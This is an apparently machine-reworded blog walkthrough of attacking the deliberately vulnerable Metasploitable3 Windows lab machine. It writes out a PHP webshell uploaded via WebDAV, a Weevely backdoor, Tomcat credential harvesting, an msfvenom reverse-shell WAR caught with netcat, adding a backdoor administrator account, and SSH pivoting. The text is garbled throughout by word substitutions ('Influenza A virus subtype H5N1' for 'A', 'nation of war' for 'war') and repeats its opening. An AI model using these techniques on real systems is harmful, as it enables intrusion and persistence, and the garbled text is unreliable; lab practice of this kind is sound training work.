I was excited to encounter the latest version of Metasploitable provided us alongside a vulnerable Windows target to do on. Building as well as configuring was non hard ane time you lot convey all of the dependencies down. I won’t larn also deep into edifice the box but hither are the basics of what I did:
Using a fresh install of Windows 10 I downloaded VirtualBox 5.0.30, Vagrant 1.8.7 as well as the latest version of Packer 0.12.0.
I cloned the Git repository here: https://github.com/rapid7/metasploitable3
I decided to live lazy as well as utilization the included Powershell script to auto-build it, I merely had to brand the next dependency changes inwards the script thus it would run.
I changed:
If you lot convey whatsoever issues alongside the laid upwardly experience gratis to larn out a comment or hitting me upwardly on Twitter.
Here’s a quick walk through for ane path to local access equally good equally privilege escalation using generally manual techniques.
I started off alongside an nmap scan of all ports to position running services.
I browsed to the URL as well as saw an uploads directory right away, this looked promising.
There is aught inwards our uploads directory…yet…
Using Cadaver which is command-line Webdav customer I was able to upload the next unproblematic PHP webshell unauthenticated. This webshell lets you lot run one-off commands as well as is pretty cumbersome/tedious to operate alongside but its a start!
Influenza A virus subtype H5N1 quick exam to confirm ascendancy execution:
Influenza A virus subtype H5N1 netstat showed me multiple additional ports listening which explains the 2nd NIC inwards the ipconfig ascendancy results earlier.
I do a WAR backdoor using msfvenom as well as unpack it to larn the filename of the corresponding .jsp file.
Browsing straight to the directory does non yield us anything, nosotros nevertheless demand to specify the exact .jsp file.
I side past times side laid upwardly a netcat listener as well as browsed to: http://192.168.253.143:8282/shell/fmzbtohe.jsp
This was merely ane quick as well as tardily manner to local access as well as ultimately escalate privileges to SYSTEM. I volition add together to this postal service inwards the time to come to highlight other paths without the utilization of Metasploit. I volition also do a dissever postal service on the many ways inwards using Metasploit because it is a dandy tool/way to outset as well as gain confidence but should non supervene upon honing your manual exploitation science set.
Using a fresh install of Windows 10 I downloaded VirtualBox 5.0.30, Vagrant 1.8.7 as well as the latest version of Packer 0.12.0.
I cloned the Git repository here: https://github.com/rapid7/metasploitable3
I decided to live lazy as well as utilization the included Powershell script to auto-build it, I merely had to brand the next dependency changes inwards the script thus it would run.
I changed:
$virtualBoxMinVersion = "5.1.6" $packerMinVersion = "0.10.0" $vagrantMinVersion = "1.8.6" $vagrantreloadMinVersion = "0.0.1"to:
$ErrorActionPreference = "Stop" $virtualBoxMinVersion = "5.0.30" $packerMinVersion = "0.12.0" $vagrantMinVersion = "1.8.7" $vagrantreloadMinVersion = "0.0.1"This ran for a land but ane time it was done I typed
vagrant up
as well as allow this run for a land to line inwards all of the configurations. Once this completed I loaded it inwards VirtualBox as well as logged inwards alongside the credentials vagrant/vagrant to brand certain it was working properly. I as well as thus exported from VirtualBox equally an .ova as well as imported into my VMware lab laid up.If you lot convey whatsoever issues alongside the laid upwardly experience gratis to larn out a comment or hitting me upwardly on Twitter.
Here’s a quick walk through for ane path to local access equally good equally privilege escalation using generally manual techniques.
I started off alongside an nmap scan of all ports to position running services.
root@mrb3n: # nmap -sV -p- -T4 192.168.253.143 Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-03 17:22 EST Nmap scan study for 192.168.253.143 Host is upwardly (0.00038s latency). Not shown: 65518 filtered ports PORT STATE SERVICE VERSION 21/tcp opened upwardly ftp Microsoft ftpd 22/tcp opened upwardly ssh OpenSSH 7.1 (protocol 2.0) 80/tcp opened upwardly http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 1617/tcp opened upwardly unknown 3000/tcp opened upwardly http WEBrick httpd 1.3.1 (Ruby 2.3.1 (2016-04-26)) 4848/tcp opened upwardly ssl/appserv-http? 5985/tcp opened upwardly http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 8022/tcp opened upwardly http Apache Tomcat/Coyote JSP engine 1.1 8080/tcp opened upwardly http-proxy GlassFish Server Open Source Edition 4.0 8282/tcp opened upwardly http Apache Tomcat/Coyote JSP engine 1.1 8484/tcp opened upwardly http Jetty winstone-2.8 8585/tcp opened upwardly http Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2) 9200/tcp opened upwardly wap-wsp? 49153/tcp opened upwardly msrpc Microsoft Windows RPC 49154/tcp opened upwardly msrpc Microsoft Windows RPC 49231/tcp opened upwardly unknown 49235/tcp opened upwardly unknownPort 8585 caught my pump equally this could live a WAMP installation alongside webdav maybe enabled.
I browsed to the URL as well as saw an uploads directory right away, this looked promising.
root@mrb3n: /Desktop/metasploitable3# truthful cat shell.php <?php echo shell_exec($_GET['e']); ?>Our upload succeeded
root@mrb3n: /Desktop/metasploitable3# cadaver http://192.168.253.143:8585/uploads/ dav:/uploads/> lay shell.php Uploading shell.php to `/uploads/shell.php': Progress: [=============================>] 100.0% of 38 bytes succeeded. dav:/uploads/>
Influenza A virus subtype H5N1 quick exam to confirm ascendancy execution:
root@mrb3n: /Desktop/metasploitable3# roll http://192.168.253.143:8585/uploads/shell.php?e=ipconfig Windows IP Configuration Ethernet adapter Local Area Connection 4: Connection-specific DNS Suffix . : localdomain Link-local IPv6 Address . . . . . : fe80::ad02:4595:821a:bb65%16 IPv4 Address. . . . . . . . . . . : 192.168.253.143 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : Ethernet adapter Local Area Connection 3: Connection-specific DNS Suffix . : localdomain Link-local IPv6 Address . . . . . : fe80::69d3:300:90dd:c46%15 IPv4 Address. . . . . . . . . . . : 192.168.110.140 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.110.2 Tunnel adapter isatap.localdomain: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : localdomainI decided to utilization Weevely to generate a semi-interactive spider web compaction as well as uploaded it to the target.
root@mrb3n: /Desktop/metasploitable3# weevely generate pass123 /root/Desktop/metasploitable3/weevely.php Generated backdoor with password 'pass123' in '/root/Desktop/metasploitable3/weevely.php' of 1446 byte size. root@mrb3n: /Desktop/metasploitable3# weevely http://192.168.253.143:8585/uploads/weevely.php pass123 [+] weevely 3.2.0 [+] Target: 192.168.253.143:8585 [+] Session: /root/.weevely/sessions/192.168.253.143/weevely_0.session [+] Browse the filesystem or execute commands starts the connectedness [+] to the target. Type :help for to a greater extent than information.
metasploitable3:C:\wamp\www\uploads $ netstat -ant Active Connections Proto Local Address Foreign Address State Offload State TCP 0.0.0.0:21 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:22 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:80 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:135 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:445 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:1617 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:3000 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:3700 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:4848 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:7676 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:8019 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:8022 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:8028 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:8031 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:8032 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:8181 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:8282 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:8443 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:8444 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:8484 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:8585 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:8686 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:9200 0.0.0.0:0 LISTENING InHost TCP 0.0.0.0:9300 0.0.0.0:0 LISTENING InHostI had a expect unopen to at what other services are installed. Digging into the ‘Apache Software Foundation’ directory nosotros detect a Tomcat install along alongside the tomcat-users.xml file alongside cleartext credentials for the tomcat manager.
metasploitable3:C:\wamp\www\uploads $ cd "C:\Program Files" metasploitable3:C:\Program Files $ dir Volume in drive C is Windows 2008R2 Volume Serial Number is AC30-8D23 Directory of C:\Program Files 12/02/2016 09:26 PM <DIR> . 12/02/2016 09:26 PM <DIR> .. 12/02/2016 08:47 PM <DIR> 7-Zip 12/02/2016 08:55 PM <DIR> Apache Software Foundation 07/13/2009 07:20 PM <DIR> Common Files 12/02/2016 09:26 PM <DIR> elasticsearch-1.1.1 11/20/2010 07:33 PM <DIR> Internet Explorer 12/02/2016 08:55 PM <DIR> Java 12/02/2016 08:58 PM <DIR> jenkins 12/02/2016 09:02 PM <DIR> jmx 11/26/2016 12:54 AM <DIR> OpenSSH 11/26/2016 12:54 AM <DIR> Oracle 12/02/2016 09:11 PM <DIR> Rails_Server 12/02/2016 08:48 PM <DIR> Reference Assemblies 11/20/2010 07:33 PM <DIR> Windows Mail 07/13/2009 09:37 PM <DIR> Windows NT 12/02/2016 09:01 PM <DIR> wordpress
metasploitable3:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ type tomcat-users.xml <?xml version='1.0' encoding='utf-8'?> …………………………SNIP…………………………………. <!-- <role rolename="tomcat"/> <role rolename="role1"/> <user username="tomcat" password="<must-be-changed>" roles="tomcat"/> <user username="both" password="<must-be-changed>" roles="tomcat,role1"/> <user username="role1" password="<must-be-changed>" roles="role1"/> --> <role rolename="manager-gui"/> <user username="sploit" password="sploit" roles="manager-gui"/> </tomcat-users>The server.xml file tells us that Tomcat is running on port 8282:
metasploitable3:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ to a greater extent than server.xml <?xml version='1.0' encoding='utf-8'?> <!-- Licensed to the Apache Software Foundation (ASF) nether ane or to a greater extent than contributor license agreements. See the NOTICE file distributed with this operate for additional data regarding copyright ownership. The ASF licenses this file to You nether the Apache License, Version 2.0 (the "License"); you lot may not use this file except in compliance with the License. You may obtain a re-create of the License at ..........................snip............................................... <!-- Influenza A virus subtype H5N1 "Connector" represents an endpoint by which requests are received and responses are returned. Documentation at : Java HTTP Connector: /docs/config/http.html (blocking & non-blocking) Java AJP Connector: /docs/config/ajp.html APR (HTTP/AJP) Connector: /docs/apr.html Define a non-SSL/TLS HTTP/1.1 Connector on port 8080 --> <Connector port="8282" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" /> <!-- Influenza A virus subtype H5N1 "Connector" using the shared thread pool--Logging inwards to the Tomcat manager alongside the credentials sploit:sploit I am able to deploy a malicious WAR file to obtain a opposite shell.
root@mrb3n: /Desktop/metasploitable3# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.253.130 LPORT=8443 -f nation of war > shell.war
root@mrb3n: /Desktop/metasploitable3# unzip shell.war Archive: shell.war creating: META-INF/ inflating: META-INF/MANIFEST.MF creating: WEB-INF/ inflating: WEB-INF/web.xml inflating: fmzbtohe.jsp inflating: OONNFiRvYlVcbIh.txtI deployed the WAR file as well as confirmed it was successful.
root@mrb3n: /Desktop/metasploitable3# nc -lvnp 8443 listening on [any] 8443 ... connect to [192.168.253.130] from (UNKNOWN) [192.168.253.143] 51065 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.I got a hitting on my listener and, hey, a SYSTEM shell.
C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>whoami whoami nt authority\systemI added an administrative user side past times side to laid upwardly some persistence.
C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>net user benr pass123 /add cyberspace user benr pass123 /add The ascendancy completed successfully. C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>net localgroup administrators benr /add cyberspace localgroup administrators benr /add The ascendancy completed successfully.To larn at the other services nosotros demand a road tot he 192.168.110.0/24 subnet. I laid upwardly some SSH port forwarding using my novel administrative user.
root@mrb3n: /Desktop/metasploitable3# ssh -l benr -D 1080 192.168.253.143 -N -f benr@192.168.253.143's password:Edited /etc/proxychains.conf as well as at ane time I could access all services such equally terminal services.
root@mrb3n: /Desktop/metasploitable3# proxychains nmap -P0 -sT -p 3389 --open -oN tcp.nmap 192.168.110.140 ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-04 12:26 EST Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 0 undergoing Host Discovery Parallel DNS resolution of 1 host. Timing: About 0.00% done |S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK Nmap scan study for 192.168.110.140 Host is upwardly (0.0091s latency). PORT STATE SERVICE 3389/tcp opened upwardly ms-wbt-serverI confirmed that I could log in:
root@mrb3n: # proxychains rdesktop 192.168.110.140 ProxyChains-3.1 (http://proxychains.sf.net) Autoselected keyboard map en-us |S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK ERROR: CredSSP: Initialize failed, do you lot convey right kerberos tgt initialized ? |S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK Connection established using SSL. WARNING: Remote desktop does not back upwardly colouring cloth depth 24; falling dorsum to 16 ERROR: SSL_read: 5 (Success) Disconnected due to network error, retrying to reconnect for 70 minutes. |S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK ERROR: CredSSP: Initialize failed, do you lot convey right kerberos tgt initialized ? |S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK Connection established using SSL.